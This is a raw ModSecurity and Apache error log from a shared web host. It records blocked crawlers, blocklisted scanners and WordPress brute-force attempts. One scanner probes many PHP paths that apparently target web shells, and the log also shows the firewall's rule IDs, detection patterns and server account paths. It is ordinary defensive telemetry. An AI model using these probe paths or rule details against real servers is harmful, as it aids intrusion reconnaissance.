[Tue May 26 12:45:44.595444 2026] [security2:error] [pid 448967:tid 449116] [client 85.208.96.203:16924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-10-30/"] [unique_id "ahVIoOXLPuWQsfM-UVSaRwAAABM"]
[Tue May 26 12:45:44.595582 2026] [security2:error] [pid 448967:tid 449116] [client 85.208.96.203:16924] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-10-30/"] [unique_id "ahVIoOXLPuWQsfM-UVSaRwAAABM"]
[Tue May 26 12:45:44.837423 2026] [security2:error] [pid 448967:tid 449212] [client 4.201.75.230:46028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/gelay.php"] [unique_id "ahVIoOXLPuWQsfM-UVSaTgAAAHM"]
[Tue May 26 12:45:45.858408 2026] [security2:error] [pid 448967:tid 449126] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIoeXLPuWQsfM-UVSaWwAAAB0"]
[Tue May 26 12:45:46.312573 2026] [security2:error] [pid 448967:tid 449216] [client 4.201.75.230:46042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/god4m.php"] [unique_id "ahVIouXLPuWQsfM-UVSacAAAAHc"]
[Tue May 26 12:45:46.484745 2026] [security2:error] [pid 448967:tid 449199] [client 69.48.202.178:61824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVIouXLPuWQsfM-UVSabwAAAGY"], referer: https://anujtradingco.com
[Tue May 26 12:45:46.785019 2026] [security2:error] [pid 448967:tid 449097] [client 69.48.202.178:61915] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVIouXLPuWQsfM-UVSaeAAAAAA"], referer: https://anujtradingco.com
[Tue May 26 12:45:47.746963 2026] [security2:error] [pid 448967:tid 449165] [client 172.226.44.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVIouXLPuWQsfM-UVSaawAAAEQ"]
[Tue May 26 12:45:47.859312 2026] [security2:error] [pid 448967:tid 449133] [client 4.201.75.230:5257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/mari.php"] [unique_id "ahVIo-XLPuWQsfM-UVSajwAAACQ"]
[Tue May 26 12:45:48.582248 2026] [security2:error] [pid 448967:tid 449099] [client 43.157.62.101:41528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.62.157.43.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-signup.php"] [unique_id "ahVIpOXLPuWQsfM-UVSanAAAAAI"], referer: http://www.rainadelproperties.com.taotechservices.com
[Tue May 26 12:45:48.905873 2026] [security2:error] [pid 448967:tid 449223] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIpOXLPuWQsfM-UVSamwAAAH4"]
[Tue May 26 12:45:48.943218 2026] [core:crit] [pid 448967:tid 449098] (13)Permission denied: [client 74.7.175.149:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:45:48.944081 2026] [security2:error] [pid 448967:tid 449098] [client 74.7.175.149:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVIpOXLPuWQsfM-UVSaqQAAAAE"]
[Tue May 26 12:45:48.944516 2026] [security2:error] [pid 448967:tid 449161] [client 74.7.175.149:35416] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com"] [uri "/robots.txt"] [unique_id "ahVIpOXLPuWQsfM-UVSapwAAAEA"]
[Tue May 26 12:45:48.987334 2026] [core:crit] [pid 448967:tid 449159] (13)Permission denied: [client 74.7.228.0:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:45:48.987922 2026] [security2:error] [pid 448967:tid 449159] [client 74.7.228.0:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com.taotechservices.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVIpOXLPuWQsfM-UVSarAAAAD4"]
[Tue May 26 12:45:48.988386 2026] [security2:error] [pid 448967:tid 449118] [client 74.7.228.0:56812] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "nigeriahomebuilders.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVIpOXLPuWQsfM-UVSaqgAAABU"]
[Tue May 26 12:45:49.349122 2026] [core:crit] [pid 448967:tid 449181] (13)Permission denied: [client 74.7.242.36:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:45:49.452393 2026] [core:crit] [pid 448967:tid 449168] (13)Permission denied: [client 74.7.227.43:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:45:50.311459 2026] [security2:error] [pid 448967:tid 449102] [client 4.201.75.230:5275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/moon.php"] [unique_id "ahVIpuXLPuWQsfM-UVSa0AAAAAU"]
[Tue May 26 12:45:51.153436 2026] [security2:error] [pid 448967:tid 449182] [client 4.201.75.230:5267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/o.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa3wAAAFU"]
[Tue May 26 12:45:51.788316 2026] [security2:error] [pid 448967:tid 449180] [client 157.20.138.61:58926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa8AAAAFM"]
[Tue May 26 12:45:51.788436 2026] [security2:error] [pid 448967:tid 449180] [client 157.20.138.61:58926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa8AAAAFM"]
[Tue May 26 12:45:52.323407 2026] [security2:error] [pid 448967:tid 449127] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIp-XLPuWQsfM-UVSa8wAAAB4"]
[Tue May 26 12:45:53.305900 2026] [security2:error] [pid 448967:tid 449178] [client 4.201.75.230:5258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/tmp.php"] [unique_id "ahVIqeXLPuWQsfM-UVSbDwAAAFE"]
[Tue May 26 12:45:54.197731 2026] [security2:error] [pid 448967:tid 449194] [client 4.201.75.230:46050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/a.php"] [unique_id "ahVIquXLPuWQsfM-UVSbIgAAAGE"]
[Tue May 26 12:45:55.111993 2026] [security2:error] [pid 448967:tid 449105] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIquXLPuWQsfM-UVSbLgAAAAg"]
[Tue May 26 12:45:55.484705 2026] [security2:error] [pid 448967:tid 449097] [client 66.132.224.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahVIq-XLPuWQsfM-UVSbPgAAAAA"]
[Tue May 26 12:45:56.726247 2026] [security2:error] [pid 448967:tid 449006] [remote 209.42.19.17:46572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVIrOXLPuWQsfM-UVSbUgAAYiY"]
[Tue May 26 12:45:57.221252 2026] [security2:error] [pid 448967:tid 449131] [client 128.140.106.114:29494] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVIrOXLPuWQsfM-UVSbUwAAACI"], referer: https://thegoodsporting.com
[Tue May 26 12:45:58.012295 2026] [security2:error] [pid 448967:tid 449148] [client 4.201.75.230:40369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/alfa.php"] [unique_id "ahVIruXLPuWQsfM-UVSbcQAAADM"]
[Tue May 26 12:45:58.135594 2026] [security2:error] [pid 448967:tid 449198] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIreXLPuWQsfM-UVSbawAAAGU"]
[Tue May 26 12:46:00.463166 2026] [security2:error] [pid 448967:tid 449179] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIr-XLPuWQsfM-UVSbmQAAAFI"]
[Tue May 26 12:46:00.532472 2026] [security2:error] [pid 448967:tid 449199] [client 64.233.173.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVIsOXLPuWQsfM-UVSbogAAAGY"]
[Tue May 26 12:46:00.697291 2026] [security2:error] [pid 448967:tid 449151] [client 4.201.75.230:5279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/network/index.php"] [unique_id "ahVIsOXLPuWQsfM-UVSbpQAAADY"]
[Tue May 26 12:46:02.468506 2026] [security2:error] [pid 448967:tid 449149] [client 157.20.138.61:59276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIsuXLPuWQsfM-UVSbywAAADQ"]
[Tue May 26 12:46:02.468667 2026] [security2:error] [pid 448967:tid 449149] [client 157.20.138.61:59276] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIsuXLPuWQsfM-UVSbywAAADQ"]
[Tue May 26 12:46:03.848702 2026] [security2:error] [pid 448967:tid 449133] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIs-XLPuWQsfM-UVSb4QAAACQ"]
[Tue May 26 12:46:06.871053 2026] [security2:error] [pid 448967:tid 449120] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVItuXLPuWQsfM-UVScFwAAABc"]
[Tue May 26 12:46:07.002267 2026] [security2:error] [pid 448967:tid 449214] [client 4.201.75.230:5286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVIt-XLPuWQsfM-UVScJQAAAHU"]
[Tue May 26 12:46:07.553886 2026] [security2:error] [pid 448967:tid 449118] [client 113.173.216.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIt-XLPuWQsfM-UVScKwAAABU"]
[Tue May 26 12:46:08.197944 2026] [security2:error] [pid 448967:tid 449124] [client 4.201.75.230:5248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-includes/IXR/test1.php"] [unique_id "ahVIuOXLPuWQsfM-UVScPAAAABs"]
[Tue May 26 12:46:09.483618 2026] [security2:error] [pid 448967:tid 449197] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIueXLPuWQsfM-UVScVgAAAGQ"]
[Tue May 26 12:46:09.599630 2026] [autoindex:error] [pid 448967:tid 449139] [client 124.156.179.141:33006] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:46:12.543114 2026] [security2:error] [pid 448967:tid 449120] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIvOXLPuWQsfM-UVScmQAAABc"]
[Tue May 26 12:46:13.389151 2026] [security2:error] [pid 448967:tid 449214] [client 157.20.138.61:59631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIveXLPuWQsfM-UVScsQAAAHU"]
[Tue May 26 12:46:13.389387 2026] [security2:error] [pid 448967:tid 449214] [client 157.20.138.61:59631] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIveXLPuWQsfM-UVScsQAAAHU"]
[Tue May 26 12:46:13.749828 2026] [security2:error] [pid 448967:tid 449183] [client 4.201.75.230:46019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-includes/js/crop/cropper.php"] [unique_id "ahVIveXLPuWQsfM-UVScvgAAAFY"]
[Tue May 26 12:46:14.858657 2026] [security2:error] [pid 448967:tid 449224] [client 4.201.75.230:5283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/app.php"] [unique_id "ahVIvuXLPuWQsfM-UVSc0AAAAH8"]
[Tue May 26 12:46:15.581899 2026] [security2:error] [pid 448967:tid 449158] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIv-XLPuWQsfM-UVSc1gAAAD0"]
[Tue May 26 12:46:16.667973 2026] [security2:error] [pid 448967:tid 449150] [client 4.201.75.230:5266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bootstrap.php"] [unique_id "ahVIwOXLPuWQsfM-UVSc8AAAADU"]
[Tue May 26 12:46:17.932208 2026] [security2:error] [pid 448967:tid 449178] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIweXLPuWQsfM-UVSc-gAAAFE"]
[Tue May 26 12:46:18.861410 2026] [security2:error] [pid 448967:tid 449135] [client 4.201.75.230:5251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/config-backup.php"] [unique_id "ahVIwuXLPuWQsfM-UVSdFQAAACY"]
